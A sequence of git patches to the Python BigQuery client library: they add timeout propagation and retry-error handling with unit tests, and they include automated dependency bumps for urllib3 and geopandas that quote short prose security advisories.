@@ -2990,6 +3015,7 @@ def to_dataframe( range_date_dtype (Any): Ignored. Added for compatibility with RowIterator. range_datetime_dtype (Any): Ignored. Added for compatibility with RowIterator. range_timestamp_dtype (Any): Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): Ignored. Added for compatibility with RowIterator. Returns: pandas.DataFrame: An empty :class:`~pandas.DataFrame`. @@ -3008,6 +3034,7 @@ def to_geodataframe( int_dtype: Union[Any, None] = DefaultPandasDTypes.INT_DTYPE, float_dtype: Union[Any, None] = None, string_dtype: Union[Any, None] = None, + timeout: Optional[float] = None, ) -> "pandas.DataFrame": """Create an empty dataframe. @@ -3021,6 +3048,7 @@ def to_geodataframe( int_dtype (Any): Ignored. Added for compatibility with RowIterator. float_dtype (Any): Ignored. Added for compatibility with RowIterator. string_dtype (Any): Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): Ignored. Added for compatibility with RowIterator. Returns: pandas.DataFrame: An empty :class:`~pandas.DataFrame`. @@ -3038,6 +3066,7 @@ def to_dataframe_iterable( dtypes: Optional[Dict[str, Any]] = None, max_queue_size: Optional[int] = None, max_stream_count: Optional[int] = None, + timeout: Optional[float] = None, ) -> Iterator["pandas.DataFrame"]: """Create an iterable of pandas DataFrames, to process the table as a stream. @@ -3056,6 +3085,9 @@ def to_dataframe_iterable( max_stream_count: Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): + Ignored. Added for compatibility with RowIterator. + Returns: An iterator yielding a single empty :class:`~pandas.DataFrame`. 
@@ -3071,6 +3103,7 @@ def to_arrow_iterable( bqstorage_client: Optional["bigquery_storage.BigQueryReadClient"] = None, max_queue_size: Optional[int] = None, max_stream_count: Optional[int] = None, + timeout: Optional[float] = None, ) -> Iterator["pyarrow.RecordBatch"]: """Create an iterable of pandas DataFrames, to process the table as a stream. @@ -3086,6 +3119,9 @@ def to_arrow_iterable( max_stream_count: Ignored. Added for compatibility with RowIterator. + timeout (Optional[float]): + Ignored. Added for compatibility with RowIterator. + Returns: An iterator yielding a single empty :class:`~pyarrow.RecordBatch`. """ diff --git a/tests/unit/job/test_query_pandas.py b/tests/unit/job/test_query_pandas.py index a6c59b158..4390309f1 100644 --- a/tests/unit/job/test_query_pandas.py +++ b/tests/unit/job/test_query_pandas.py @@ -1023,5 +1023,38 @@ def test_query_job_to_geodataframe_delegation(wait_for_query): int_dtype=DefaultPandasDTypes.INT_DTYPE, float_dtype=None, string_dtype=None, + timeout=None, ) assert df is row_iterator.to_geodataframe.return_value + + +@pytest.mark.skipif(pandas is None, reason="Requires `pandas`") +@mock.patch("google.cloud.bigquery.job.query.wait_for_query") +def test_query_job_to_dataframe_delegation(wait_for_query): + job = _make_job() + bqstorage_client = object() + timeout = 123.45 + + job.to_dataframe(bqstorage_client=bqstorage_client, timeout=timeout) + + wait_for_query.assert_called_once_with(job, None, max_results=None) + row_iterator = wait_for_query.return_value + row_iterator.to_dataframe.assert_called_once() + call_args = row_iterator.to_dataframe.call_args + assert call_args.kwargs["timeout"] == timeout + + +@pytest.mark.skipif(pyarrow is None, reason="Requires `pyarrow`") +@mock.patch("google.cloud.bigquery.job.query.wait_for_query") +def test_query_job_to_arrow_delegation(wait_for_query): + job = _make_job() + bqstorage_client = object() + timeout = 123.45 + + job.to_arrow(bqstorage_client=bqstorage_client, timeout=timeout) + + 
wait_for_query.assert_called_once_with(job, None, max_results=None) + row_iterator = wait_for_query.return_value + row_iterator.to_arrow.assert_called_once() + call_args = row_iterator.to_arrow.call_args + assert call_args.kwargs["timeout"] == timeout diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index bc94f5f54..a1cbb726b 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -13,12 +13,14 @@ # limitations under the License. import collections +import concurrent.futures import datetime import decimal import functools import gc import operator import queue +import time from typing import Union from unittest import mock import warnings @@ -2177,3 +2179,76 @@ def test_determine_requested_streams_invalid_max_stream_count(): """Tests that a ValueError is raised if max_stream_count is negative.""" with pytest.raises(ValueError): determine_requested_streams(preserve_order=False, max_stream_count=-1) + + +@pytest.mark.skipif( + bigquery_storage is None, reason="Requires google-cloud-bigquery-storage" +) +def test__download_table_bqstorage_w_timeout_error(module_under_test): + from google.cloud.bigquery import dataset + from google.cloud.bigquery import table + from unittest import mock + + mock_bqstorage_client = mock.create_autospec( + bigquery_storage.BigQueryReadClient, instance=True + ) + fake_session = mock.Mock(streams=[mock.Mock()]) + mock_bqstorage_client.create_read_session.return_value = fake_session + + table_ref = table.TableReference( + dataset.DatasetReference("project-x", "dataset-y"), + "table-z", + ) + + def slow_download_stream( + download_state, bqstorage_client, session, stream, worker_queue, page_to_item + ): + # Block until the main thread sets done=True (which it will on timeout) + while not download_state.done: + time.sleep(0.01) + + with mock.patch.object( + module_under_test, "_download_table_bqstorage_stream", new=slow_download_stream + ): + # Use a very small timeout + 
result_gen = module_under_test._download_table_bqstorage( + "some-project", table_ref, mock_bqstorage_client, timeout=0.01 + ) + with pytest.raises(concurrent.futures.TimeoutError, match="timed out"): + list(result_gen) + + +@pytest.mark.skipif( + bigquery_storage is None, reason="Requires google-cloud-bigquery-storage" +) +def test__download_table_bqstorage_w_timeout_success(module_under_test): + from google.cloud.bigquery import dataset + from google.cloud.bigquery import table + from unittest import mock + + mock_bqstorage_client = mock.create_autospec( + bigquery_storage.BigQueryReadClient, instance=True + ) + fake_session = mock.Mock(streams=["stream/s0"]) + mock_bqstorage_client.create_read_session.return_value = fake_session + + table_ref = table.TableReference( + dataset.DatasetReference("project-x", "dataset-y"), + "table-z", + ) + + def fast_download_stream( + download_state, bqstorage_client, session, stream, worker_queue, page_to_item + ): + worker_queue.put("result_page") + + with mock.patch.object( + module_under_test, "_download_table_bqstorage_stream", new=fast_download_stream + ): + # Use a generous timeout + result_gen = module_under_test._download_table_bqstorage( + "some-project", table_ref, mock_bqstorage_client, timeout=10.0 + ) + results = list(result_gen) + + assert results == ["result_page"] diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index af31d116b..97a1b4916 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -2495,6 +2495,20 @@ def test_to_geodataframe(self): else: assert not hasattr(df, "crs") + def test_methods_w_timeout(self): + pytest.importorskip("pyarrow") + pytest.importorskip("geopandas") + # Ensure that the timeout parameter is accepted by all methods without raising a TypeError, + # even though the _EmptyRowIterator implementations do not use the timeout value. 
+ timeout = 42.0 + + # Call each type to ensure no TypeError is raised + self._make_one().to_arrow(timeout=timeout) + self._make_one().to_arrow_iterable(timeout=timeout) + self._make_one().to_dataframe(timeout=timeout) + self._make_one().to_dataframe_iterable(timeout=timeout) + self._make_one().to_geodataframe(timeout=timeout) + class TestRowIterator(unittest.TestCase): PYARROW_MINIMUM_VERSION = str(_versions_helpers._MIN_PYARROW_VERSION) @@ -5665,6 +5679,7 @@ def test_rowiterator_to_geodataframe_delegation(self, to_dataframe): int_dtype=DefaultPandasDTypes.INT_DTYPE, float_dtype=None, string_dtype=None, + timeout=None, ) self.assertIsInstance(df, geopandas.GeoDataFrame) diff --git a/tests/unit/test_table_pandas.py b/tests/unit/test_table_pandas.py index a4fa3fa39..64d8b1451 100644 --- a/tests/unit/test_table_pandas.py +++ b/tests/unit/test_table_pandas.py @@ -301,6 +301,7 @@ def test_rowiterator_to_geodataframe_with_default_dtypes( int_dtype=bigquery.enums.DefaultPandasDTypes.INT_DTYPE, float_dtype=None, string_dtype=None, + timeout=None, ) mock_geopandas.GeoDataFrame.assert_called_once_with( mock_df, crs="EPSG:4326", geometry="geo_col" @@ -358,6 +359,7 @@ def test_rowiterator_to_geodataframe_with_custom_dtypes( int_dtype=custom_int_dtype, float_dtype=custom_float_dtype, string_dtype=custom_string_dtype, + timeout=None, ) mock_geopandas.GeoDataFrame.assert_called_once_with( mock_df, crs="EPSG:4326", geometry="geo_col" From 73228432a3c821db05d898ea4a4788adf15b033d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Mon, 12 Jan 2026 12:09:58 -0600 Subject: [PATCH 196/202] =?UTF-8?q?docs:=20clarify=20that=20only=20jobs.qu?= =?UTF-8?q?ery=20and=20jobs.getQueryResults=20are=20affec=E2=80=A6=20(#234?= =?UTF-8?q?9)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit …ted by page_size in query_and_wait Fixes internal issue b/433324499 Thank you for opening a Pull Request!
Before submitting your PR, there are a few things you can do to make sure it goes smoothly: - [ ] Make sure to open an issue as a [bug/issue](https://github.com/googleapis/python-bigquery/issues/new/choose) before writing your code! That way we can discuss the change, evaluate designs, and agree on the general idea - [ ] Ensure the tests and linter pass - [ ] Code coverage does not decrease (if any source code was changed) - [ ] Appropriate docs were updated (if necessary) Fixes # 🦕 Co-authored-by: Lingqing Gan --- google/cloud/bigquery/client.py | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/google/cloud/bigquery/client.py b/google/cloud/bigquery/client.py index e3a3cdb11..54c8886cd 100644 --- a/google/cloud/bigquery/client.py +++ b/google/cloud/bigquery/client.py @@ -3655,6 +3655,11 @@ def query_and_wait( page_size (Optional[int]): The maximum number of rows in each page of results from the initial jobs.query request. Non-positive values are ignored. + + This parameter only affects the jobs.query and + jobs.getQueryResults API calls. Large results downloaded with + the BigQuery Storage Read API are intentionally unaffected + by this parameter. max_results (Optional[int]): The maximum total number of rows from this request.
From 7b8ceea975a2e945eacb0a32c5946ff10e9fe20e Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 21 Jan 2026 21:53:03 +0000 Subject: [PATCH 197/202] chore(deps): update dependency urllib3 to v2.6.3 [security] (#2357) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [urllib3](https://redirect.github.com/urllib3/urllib3) ([changelog](https://redirect.github.com/urllib3/urllib3/blob/main/CHANGES.rst)) | `==2.6.0` → `==2.6.3` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/urllib3/2.6.3?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/urllib3/2.6.0/2.6.3?slim=true) | ### GitHub Vulnerability Alerts #### [CVE-2026-21441](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-38jv-5279-wg99) ### Impact urllib3's [streaming API](https://urllib3.readthedocs.io/en/2.6.2/advanced-usage.html#streaming-and-i-o) is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. urllib3 can perform decoding or decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`, `deflate`, `br`, or `zstd`). When using the streaming API, the library decompresses only the necessary bytes, enabling partial content consumption. However, for HTTP redirect responses, the library would read the entire response body to drain the connection and decompress the content unnecessarily. This decompression occurred even before any read methods were called, and configured read limits did not restrict the amount of decompressed data. As a result, there was no safeguard against decompression bombs.
A malicious server could exploit this to trigger excessive resource consumption on the client (high CPU usage and large memory allocations for decompressed data; CWE-409). ### Affected usages Applications and libraries using urllib3 version 2.6.2 and earlier to stream content from untrusted sources by setting `preload_content=False` when they do not disable redirects. ### Remediation Upgrade to at least urllib3 v2.6.3 in which the library does not decode content of redirect responses when `preload_content=False`. If upgrading is not immediately possible, disable [redirects](https://urllib3.readthedocs.io/en/2.6.2/user-guide.html#retrying-requests) by setting `redirect=False` for requests to untrusted source. --- ### Release Notes
urllib3/urllib3 (urllib3) ### [`v2.6.3`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#263-2026-01-07) [Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.2...2.6.3) \================== - Fixed a high-severity security issue where decompression-bomb safeguards of the streaming API were bypassed when HTTP redirects were followed. (`GHSA-38jv-5279-wg99 `\_\_) - Started treating `Retry-After` times greater than 6 hours as 6 hours by default. (`#​3743 `\_\_) - Fixed `urllib3.connection.VerifiedHTTPSConnection` on Emscripten. (`#​3752 `\_\_) ### [`v2.6.2`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#262-2025-12-11) [Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.1...2.6.2) \================== - Fixed `HTTPResponse.read_chunked()` to properly handle leftover data in the decoder's buffer when reading compressed chunked responses. (`#​3734 `\_\_) ### [`v2.6.1`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#261-2025-12-08) [Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.6.0...2.6.1) \================== - Restore previously removed `HTTPResponse.getheaders()` and `HTTPResponse.getheader()` methods. (`#​3731 `\_\_)
--- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/googleapis/python-bigquery). Co-authored-by: Anthonios Partheniou --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index ec5c7f2af..dd94deab6 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -41,4 +41,4 @@ Shapely==2.1.2; python_version >= '3.10' six==1.17.0 typing-extensions==4.15.0 typing-inspect==0.9.0 -urllib3==2.6.0 +urllib3==2.6.3 From 24d45d0d5bf89762f253ba6bd6fdbee9d5993422 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 29 Jan 2026 13:23:16 -0500 Subject: [PATCH 198/202] fix: updates timeout/retry code to respect hanging server (#2408) **Description** This PR fixes a crash when handling `_InactiveRpcError` during retry logic and ensures proper `timeout` propagation in `RowIterator.to_dataframe`. **Fixes** **Retry Logic Crash**: Addressed an issue in `google/cloud/bigquery/retry.py` where `_should_retry` would raise a `TypeError` when inspecting unstructured `gRPC` errors (like `_InactiveRpcError`). The fix adds robust error inspection to fallback gracefully when `exc.errors` is not subscriptable. **Timeout Propagation**: Added the missing `timeout` parameter to `RowIterator.to_dataframe` in `google/cloud/bigquery/table.py`.
This ensures that the user-specified `timeout` is correctly passed down to the underlying `to_arrow` call, preventing the client from hanging indefinitely when the Storage API is unresponsive. **Changes** Modified `google/cloud/bigquery/retry.py`: Updated `_should_retry` to handle `TypeError` and `KeyError` when accessing `exc.errors`. Modified `google/cloud/bigquery/table.py`: Updated `RowIterator.to_dataframe` signature and implementation to accept and pass the `timeout` parameter. The first half of this work was completed in PR #2354 --- google/cloud/bigquery/_pandas_helpers.py | 49 +++++++-- google/cloud/bigquery/dbapi/cursor.py | 2 + google/cloud/bigquery/retry.py | 16 ++- google/cloud/bigquery/table.py | 6 +- tests/unit/job/test_query_pandas.py | 6 ++ tests/unit/test__pandas_helpers.py | 131 +++++++++++++++++++++++ tests/unit/test_client_retry.py | 7 +- tests/unit/test_dbapi_cursor.py | 6 +- tests/unit/test_table.py | 8 ++ 9 files changed, 214 insertions(+), 17 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 5460f7ca7..7bd9f99b6 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -33,6 +33,7 @@ from google.cloud.bigquery import _pyarrow_helpers from google.cloud.bigquery import _versions_helpers +from google.cloud.bigquery import retry as bq_retry from google.cloud.bigquery import schema @@ -740,7 +741,7 @@ def _row_iterator_page_to_arrow(page, column_names, arrow_types): return pyarrow.RecordBatch.from_arrays(arrays, names=column_names) -def download_arrow_row_iterator(pages, bq_schema): +def download_arrow_row_iterator(pages, bq_schema, timeout=None): """Use HTTP JSON RowIterator to construct an iterable of RecordBatches. Args: @@ -751,6 +752,10 @@ def download_arrow_row_iterator(pages, bq_schema): Mapping[str, Any] \ ]]): A decription of the fields in result pages. 
+ timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Yields: :class:`pyarrow.RecordBatch` The next page of records as a ``pyarrow`` record batch. @@ -759,8 +764,16 @@ def download_arrow_row_iterator(pages, bq_schema): column_names = bq_to_arrow_schema(bq_schema) or [field.name for field in bq_schema] arrow_types = [bq_to_arrow_data_type(field) for field in bq_schema] - for page in pages: - yield _row_iterator_page_to_arrow(page, column_names, arrow_types) + if timeout is None: + for page in pages: + yield _row_iterator_page_to_arrow(page, column_names, arrow_types) + else: + start_time = time.monotonic() + for page in pages: + if time.monotonic() - start_time > timeout: + raise concurrent.futures.TimeoutError() + + yield _row_iterator_page_to_arrow(page, column_names, arrow_types) def _row_iterator_page_to_dataframe(page, column_names, dtypes): @@ -778,7 +791,7 @@ def _row_iterator_page_to_dataframe(page, column_names, dtypes): return pandas.DataFrame(columns, columns=column_names) -def download_dataframe_row_iterator(pages, bq_schema, dtypes): +def download_dataframe_row_iterator(pages, bq_schema, dtypes, timeout=None): """Use HTTP JSON RowIterator to construct a DataFrame. Args: @@ -792,14 +805,27 @@ def download_dataframe_row_iterator(pages, bq_schema, dtypes): dtypes(Mapping[str, numpy.dtype]): The types of columns in result data to hint construction of the resulting DataFrame. Not all column types have to be specified. + timeout (Optional[float]): + The number of seconds to wait for the underlying download to complete. + If ``None``, wait indefinitely. + Yields: :class:`pandas.DataFrame` The next page of records as a ``pandas.DataFrame`` record batch. 
""" bq_schema = schema._to_schema_fields(bq_schema) column_names = [field.name for field in bq_schema] - for page in pages: - yield _row_iterator_page_to_dataframe(page, column_names, dtypes) + + if timeout is None: + for page in pages: + yield _row_iterator_page_to_dataframe(page, column_names, dtypes) + else: + start_time = time.monotonic() + for page in pages: + if time.monotonic() - start_time > timeout: + raise concurrent.futures.TimeoutError() + + yield _row_iterator_page_to_dataframe(page, column_names, dtypes) def _bqstorage_page_to_arrow(page): @@ -928,6 +954,7 @@ def _download_table_bqstorage( if "@" in table.table_id: raise ValueError("Reading from a specific snapshot is not currently supported.") + start_time = time.monotonic() requested_streams = determine_requested_streams(preserve_order, max_stream_count) requested_session = bigquery_storage.types.stream.ReadSession( @@ -944,10 +971,16 @@ def _download_table_bqstorage( ArrowSerializationOptions.CompressionCodec(1) ) + retry_policy = ( + bq_retry.DEFAULT_RETRY.with_deadline(timeout) if timeout is not None else None + ) + session = bqstorage_client.create_read_session( parent="projects/{}".format(project_id), read_session=requested_session, max_stream_count=requested_streams, + retry=retry_policy, + timeout=timeout, ) _LOGGER.debug( @@ -983,8 +1016,6 @@ def _download_table_bqstorage( # Manually manage the pool to control shutdown behavior on timeout. 
pool = concurrent.futures.ThreadPoolExecutor(max_workers=max(1, total_streams)) wait_on_shutdown = True - start_time = time.time() - try: # Manually submit jobs and wait for download to complete rather # than using pool.map because pool.map continues running in the @@ -1006,7 +1037,7 @@ def _download_table_bqstorage( while not_done: # Check for timeout if timeout is not None: - elapsed = time.time() - start_time + elapsed = time.monotonic() - start_time if elapsed > timeout: wait_on_shutdown = False raise concurrent.futures.TimeoutError( diff --git a/google/cloud/bigquery/dbapi/cursor.py b/google/cloud/bigquery/dbapi/cursor.py index 014a6825e..bffd7678f 100644 --- a/google/cloud/bigquery/dbapi/cursor.py +++ b/google/cloud/bigquery/dbapi/cursor.py @@ -323,6 +323,8 @@ def _bqstorage_fetch(self, bqstorage_client): read_session=requested_session, # a single stream only, as DB API is not well-suited for multithreading max_stream_count=1, + retry=None, + timeout=None, ) if not read_session.streams: diff --git a/google/cloud/bigquery/retry.py b/google/cloud/bigquery/retry.py index 19012efd6..6fd458df5 100644 --- a/google/cloud/bigquery/retry.py +++ b/google/cloud/bigquery/retry.py @@ -12,12 +12,15 @@ # See the License for the specific language governing permissions and # limitations under the License. +import logging + from google.api_core import exceptions from google.api_core import retry import google.api_core.future.polling from google.auth import exceptions as auth_exceptions # type: ignore import requests.exceptions +_LOGGER = logging.getLogger(__name__) _RETRYABLE_REASONS = frozenset( ["rateLimitExceeded", "backendError", "internalError", "badGateway"] @@ -61,14 +64,17 @@ def _should_retry(exc): """Predicate for determining when to retry. - We retry if and only if the 'reason' is 'backendError' - or 'rateLimitExceeded'. + We retry if and only if the 'reason' is in _RETRYABLE_REASONS or is + in _UNSTRUCTURED_RETRYABLE_TYPES. 
""" - if not hasattr(exc, "errors") or len(exc.errors) == 0: - # Check for unstructured error returns, e.g. from GFE + try: + reason = exc.errors[0]["reason"] + except (AttributeError, IndexError, TypeError, KeyError): + # Fallback for when errors attribute is missing, empty, or not a dict + # or doesn't contain "reason" (e.g. gRPC exceptions). + _LOGGER.debug("Inspecting unstructured error for retry: %r", exc) return isinstance(exc, _UNSTRUCTURED_RETRYABLE_TYPES) - reason = exc.errors[0]["reason"] return reason in _RETRYABLE_REASONS diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index 195461006..88b673a8b 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -2152,7 +2152,10 @@ def to_arrow_iterable( timeout=timeout, ) tabledata_list_download = functools.partial( - _pandas_helpers.download_arrow_row_iterator, iter(self.pages), self.schema + _pandas_helpers.download_arrow_row_iterator, + iter(self.pages), + self.schema, + timeout=timeout, ) return self._to_page_iterable( bqstorage_download, @@ -2366,6 +2369,7 @@ def to_dataframe_iterable( iter(self.pages), self.schema, dtypes, + timeout=timeout, ) return self._to_page_iterable( bqstorage_download, diff --git a/tests/unit/job/test_query_pandas.py b/tests/unit/job/test_query_pandas.py index 4390309f1..e0e0438f5 100644 --- a/tests/unit/job/test_query_pandas.py +++ b/tests/unit/job/test_query_pandas.py @@ -179,6 +179,8 @@ def test_to_dataframe_bqstorage_preserve_order(query, table_read_options_kwarg): parent="projects/test-project", read_session=expected_session, max_stream_count=1, # Use a single stream to preserve row order. + retry=None, + timeout=None, ) @@ -593,6 +595,8 @@ def test_to_dataframe_bqstorage(table_read_options_kwarg): parent="projects/bqstorage-billing-project", read_session=expected_session, max_stream_count=0, # Use default number of streams for best performance. 
+ retry=None, + timeout=None, ) bqstorage_client.read_rows.assert_called_once_with(stream_id) @@ -644,6 +648,8 @@ def test_to_dataframe_bqstorage_no_pyarrow_compression(): parent="projects/bqstorage-billing-project", read_session=expected_session, max_stream_count=0, + retry=None, + timeout=None, ) diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index a1cbb726b..6ec62c0b6 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -2252,3 +2252,134 @@ def fast_download_stream( results = list(result_gen) assert results == ["result_page"] + + +@pytest.mark.skipif(pandas is None, reason="Requires `pandas`") +@pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") +@pytest.mark.parametrize( + "sleep_time, timeout, should_timeout", + [ + (0.1, 0.05, True), # Timeout case + (0, 10.0, False), # Success case + ], +) +def test_download_arrow_row_iterator_with_timeout( + module_under_test, sleep_time, timeout, should_timeout +): + bq_schema = [schema.SchemaField("name", "STRING")] + + # Mock page with to_arrow method + mock_page = mock.Mock() + mock_page.to_arrow.return_value = pyarrow.RecordBatch.from_arrays( + [pyarrow.array(["foo"])], + names=["name"], + ) + mock_page.__iter__ = lambda self: iter(["row1"]) + mock_page._columns = [["foo"]] + + def pages_gen(): + # First page yields quickly + yield mock_page + if sleep_time > 0: + time.sleep(sleep_time) + yield mock_page + + iterator = module_under_test.download_arrow_row_iterator( + pages_gen(), bq_schema, timeout=timeout + ) + + # First item should always succeed + next(iterator) + + if should_timeout: + with pytest.raises(concurrent.futures.TimeoutError): + next(iterator) + else: + # Should succeed and complete + results = list(iterator) + assert len(results) == 1 # 1 remaining item + + +@pytest.mark.skipif(pandas is None, reason="Requires `pandas`") +@pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires 
`pyarrow`") +@pytest.mark.parametrize( + "sleep_time, timeout, should_timeout", + [ + (0.1, 0.05, True), # Timeout case + (0, 10.0, False), # Success case + ], +) +def test_download_dataframe_row_iterator_with_timeout( + module_under_test, sleep_time, timeout, should_timeout +): + bq_schema = [schema.SchemaField("name", "STRING")] + dtypes = {} + + # Mock page + mock_page = mock.Mock() + # Mock iterator for _row_iterator_page_to_dataframe checking next(iter(page)) + mock_page.__iter__ = lambda self: iter(["row1"]) + mock_page._columns = [["foo"]] + + def pages_gen(): + yield mock_page + if sleep_time > 0: + time.sleep(sleep_time) + yield mock_page + + iterator = module_under_test.download_dataframe_row_iterator( + pages_gen(), bq_schema, dtypes, timeout=timeout + ) + + next(iterator) + + if should_timeout: + with pytest.raises(concurrent.futures.TimeoutError): + next(iterator) + else: + results = list(iterator) + assert len(results) == 1 + + +@pytest.mark.skipif( + bigquery_storage is None, reason="Requires `google-cloud-bigquery-storage`" +) +def test_download_arrow_bqstorage_passes_timeout_to_create_read_session( + module_under_test, +): + # Mock dependencies + project_id = "test-project" + table = mock.Mock() + table.table_id = "test_table" + table.to_bqstorage.return_value = "projects/test/datasets/test/tables/test" + + bqstorage_client = mock.create_autospec( + bigquery_storage.BigQueryReadClient, instance=True + ) + # Mock create_read_session to return a session with no streams so the function returns early + # (Checking start of loop logic vs empty streams return) + session = mock.Mock() + # If streams is empty, _download_table_bqstorage returns early, which is fine for this test + session.streams = [] + bqstorage_client.create_read_session.return_value = session + + # Call the function + timeout = 123.456 + # download_arrow_bqstorage yields frames, so we need to iterate to trigger execution + list( + module_under_test.download_arrow_bqstorage( + project_id, 
table, bqstorage_client, timeout=timeout + ) + ) + + # Verify timeout and retry were passed + bqstorage_client.create_read_session.assert_called_once() + _, kwargs = bqstorage_client.create_read_session.call_args + assert "timeout" in kwargs + assert kwargs["timeout"] == timeout + + assert "retry" in kwargs + retry_policy = kwargs["retry"] + assert retry_policy is not None + # Check if deadline is set correctly in the retry policy + assert retry_policy._deadline == timeout diff --git a/tests/unit/test_client_retry.py b/tests/unit/test_client_retry.py index 6e49cc464..f0e7ac88f 100644 --- a/tests/unit/test_client_retry.py +++ b/tests/unit/test_client_retry.py @@ -23,6 +23,11 @@ PROJECT = "test-project" +# A deadline > 1.0s is required because the default retry (google.api_core.retry.Retry) +# has an initial delay of 1.0s. If the deadline is <= 1.0s, the first retry attempt +# (scheduled for now + 1.0s) will be rejected immediately as exceeding the deadline. +_RETRY_DEADLINE = 10.0 + def _make_credentials(): import google.auth.credentials @@ -83,7 +88,7 @@ def test_call_api_applying_custom_retry_on_timeout(global_time_lock): "api_request", side_effect=[TimeoutError, "result"], ) - retry = DEFAULT_RETRY.with_deadline(1).with_predicate( + retry = DEFAULT_RETRY.with_deadline(_RETRY_DEADLINE).with_predicate( lambda exc: isinstance(exc, TimeoutError) ) diff --git a/tests/unit/test_dbapi_cursor.py b/tests/unit/test_dbapi_cursor.py index 6fca4cec0..c5cad8c91 100644 --- a/tests/unit/test_dbapi_cursor.py +++ b/tests/unit/test_dbapi_cursor.py @@ -480,7 +480,11 @@ def fake_ensure_bqstorage_client(bqstorage_client=None, **kwargs): data_format=bigquery_storage.DataFormat.ARROW, ) mock_bqstorage_client.create_read_session.assert_called_once_with( - parent="projects/P", read_session=expected_session, max_stream_count=1 + parent="projects/P", + read_session=expected_session, + max_stream_count=1, + retry=None, + timeout=None, ) # Check the data returned. 
diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 97a1b4916..a8397247d 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -4125,6 +4125,10 @@ def test_to_dataframe_tqdm_error(self): # Warn that a progress bar was requested, but creating the tqdm # progress bar failed. for warning in warned: # pragma: NO COVER + # Pyparsing warnings appear to be coming from a transitive + # dependency and are unrelated to the code under test. + if "Pyparsing" in warning.category.__name__: + continue self.assertIn( warning.category, [UserWarning, DeprecationWarning, tqdm.TqdmExperimentalWarning], @@ -6853,6 +6857,8 @@ def test_to_arrow_iterable_w_bqstorage_max_stream_count(preserve_order): parent=mock.ANY, read_session=mock.ANY, max_stream_count=max_stream_count if not preserve_order else 1, + retry=None, + timeout=None, ) @@ -6888,4 +6894,6 @@ def test_to_dataframe_iterable_w_bqstorage_max_stream_count(preserve_order): parent=mock.ANY, read_session=mock.ANY, max_stream_count=max_stream_count if not preserve_order else 1, + retry=None, + timeout=None, ) From d5cc42b71726fef46715587df6379c325979667a Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 12 Feb 2026 15:18:49 +0000 Subject: [PATCH 199/202] chore(deps): update dependency geopandas to v1.1.2 [security] (#2411) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [geopandas](https://redirect.github.com/geopandas/geopandas) | `==1.1.1` β†’ `==1.1.2` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/geopandas/1.1.2?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/geopandas/1.1.1/1.1.2?slim=true) | ### GitHub Vulnerability Alerts #### [CVE-2025-69662](https://nvd.nist.gov/vuln/detail/CVE-2025-69662) SQL 
injection vulnerability in geopandas before v.1.1.2 allows an attacker to obtain sensitive information via the `to_postgis()` function being used to write GeoDataFrames to a PostgreSQL database. --- ### Release Notes
